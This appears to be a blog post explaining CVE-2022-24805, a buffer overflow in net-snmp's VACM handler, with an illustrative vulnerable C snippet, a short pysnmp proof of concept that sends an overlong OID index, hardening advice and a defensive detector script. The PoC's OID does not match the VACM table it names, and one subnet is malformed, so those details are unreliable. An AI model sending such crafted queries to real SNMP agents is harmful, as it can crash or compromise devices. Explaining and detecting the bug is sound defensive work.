CVE-2022-24805 is a serious vulnerability in net-snmp, a widely used toolkit for monitoring network devices via SNMP (Simple Network Management Protocol). The bug stems from unsafe handling of the INDEX field in the NET-SNMP-VACM-MIB handler, which can cause a buffer overflow and out-of-bounds memory access. Notably, an attacker does not need write privileges: read-only SNMP credentials are enough to trigger the flaw. This post unpacks the technical details, demonstrates exploitation basics, and offers practical protection steps.
What is net-snmp?
net-snmp is a popular suite providing SNMP libraries and command-line programs such as snmpget, snmpwalk, and the snmpd agent. SNMP is commonly used for monitoring and managing routers, switches, printers, servers, and virtual devices.
Reference:
- Net-SNMP website
The Vulnerability Explained
CVE-2022-24805 (GitHub Advisory: GHSA-q2pr-55mw-72qq) affects net-snmp versions before 5.9.2.
- An attacker sends a maliciously crafted SNMP query.
- The SNMP agent (the monitored device running net-snmp) reads past buffer boundaries, possibly crashing or leaking internal state.
Risk Level:
This flaw is *remotely exploitable* by anyone with valid SNMP credentials (even read-only!). The barrier to entry is low if credentials are weak or widely distributed.
The vulnerability exists in code that processes SNMP GET or WALK requests like this one:

```shell
snmpwalk -v2c -c public <target-ip> NET-SNMP-VACM-MIB
```

But if an attacker crafts the OID (Object Identifier) in a certain way, they can overflow the buffer.
Imagine the vulnerable C code might look like this (a simplified illustration, not the actual net-snmp source):

```c
char index[MAX_INDEX_LEN];              /* fixed-size buffer for the parsed INDEX */
int  index_len = request_index_length;  /* taken from the request: attacker-controlled */

/* The copy trusts index_len; nothing compares it against MAX_INDEX_LEN first. */
memcpy(index, request_index, index_len); /* writes past the buffer when index_len > MAX_INDEX_LEN */

/* The length check that should have guarded the copy was missing in the old code. */
```

By sending an INDEX larger than MAX_INDEX_LEN, memory beyond `index` is overwritten, opening the door to segmentation faults or even code execution on some platforms.
Simple PoC using pysnmp

```python
from pysnmp.hlapi import *

# Replace with victim's IP and valid SNMP community
target = '192.168.1.100'
community = 'public'

# OID for VACM securityToGroupTable with overlong index
malicious_oid = (1, 3, 6, 1, 4, 1, 8072, 1, 3, 2, 1, 2) + (255,) * 32  # 32+ bytes

errorIndication, errorStatus, errorIndex, varBinds = next(
    getCmd(
        SnmpEngine(),
        CommunityData(community, mpModel=1),  # SNMP v2c
        UdpTransportTarget((target, 161)),
        ContextData(),
        ObjectType(ObjectIdentity(malicious_oid))
    )
)

if errorIndication:
    print(errorIndication)
```
This code asks net-snmp for an OID with an abnormally long index, aiming to overflow the internal buffer.
Exploitability
- SNMPv1/v2c only require a “community string” (like a weak password).
What Fixed the Bug?
net-snmp 5.9.2 patched these unsafe memory operations.
See commit: net-snmp/net-snmp@201f51a
Example snmpd.conf restricting access

```
rocommunity VHn84U3f7hwZ 192.168../24
```

This allows read-only SNMP from your internal LAN only.
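Beyond restricting who may talk to the agent, a defender can watch request traffic for the shape this bug needs: a varbind OID under the VACM tables carrying far more index sub-identifiers than the MIB allows. The following Python is an added example, not code from net-snmp or from this post; the per-table limits are an assumption derived from the SIZE clauses in SNMP-VIEW-BASED-ACM-MIB, and the input is the BER content octets of an OID taken from a captured GET request.

```python
# Table-entry OIDs from SNMP-VIEW-BASED-ACM-MIB mapped to the most sub-identifiers
# (column number + INDEX) a legitimate varbind can carry after the entry OID.
# Assumption: limits derived from the MIB's SIZE clauses (names up to 32 octets).
VACM_ENTRY_LIMITS = {
    (1, 3, 6, 1, 6, 3, 16, 1, 2, 1): 36,  # vacmSecurityToGroupEntry: model, len, name
    (1, 3, 6, 1, 6, 3, 16, 1, 4, 1): 70,  # vacmAccessEntry: group, ctx prefix, model, level
}

def decode_oid(data: bytes) -> tuple:
    """Decode BER OID content octets into a tuple of sub-identifiers."""
    if not data:
        raise ValueError("empty OID")
    if data[-1] & 0x80:  # continuation bit set on the last octet
        raise ValueError("truncated sub-identifier")
    first = data[0]
    subids = [first // 40, first % 40] if first < 80 else [2, first - 80]
    value = 0
    for b in data[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:  # last octet of this sub-identifier
            subids.append(value)
            value = 0
    return tuple(subids)

def encode_oid(subids) -> bytes:
    """Encode sub-identifiers to BER OID content octets (used to build samples)."""
    out = bytearray([subids[0] * 40 + subids[1]])
    for s in subids[2:]:
        chunk = [s & 0x7F]
        s >>= 7
        while s:
            chunk.append(0x80 | (s & 0x7F))
            s >>= 7
        out.extend(reversed(chunk))
    return bytes(out)

def check_varbind_oid(oid_bytes: bytes, limits=VACM_ENTRY_LIMITS):
    """Return an alert string if the OID's INDEX exceeds its table's limit, else None."""
    oid = decode_oid(oid_bytes)
    for entry, limit in limits.items():
        if oid[:len(entry)] == entry and len(oid) - len(entry) > limit:
            return f"overlong INDEX: {len(oid) - len(entry)} sub-ids after {'.'.join(map(str, entry))} (limit {limit})"
    return None

# Constructed samples: vacmGroupName lookup for securityModel 2 / name "public",
# and the same column padded with 64 trailing sub-identifiers.
NORMAL_OID = (1, 3, 6, 1, 6, 3, 16, 1, 2, 1, 3, 2, 6) + tuple(b"public")
PADDED_OID = (1, 3, 6, 1, 6, 3, 16, 1, 2, 1, 3) + (255,) * 64
```

Feed `check_varbind_oid` the OID octets of each varbind in inbound GET/GETNEXT PDUs (for example from a packet capture) and alert on any non-None result; a hit from a host that should only be doing routine polling is worth a look even after patching.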
More Information
- Upstream Net-SNMP Advisory
- NVD entry for CVE-2022-24805
- VacmSecurityToGroupTable MIB details (OID)
Conclusion
CVE-2022-24805 is a stark reminder of how a small parsing bug in widely used protocols like SNMP can open the door to attacks—often with just read-only credentials. Always lock down monitoring interfaces, use the newest versions, and keep SNMP credentials secret and strong!
*Stay safe out there and always audit your network monitoring stack!*
Timeline
Published on: 04/16/2024 20:15:07 UTC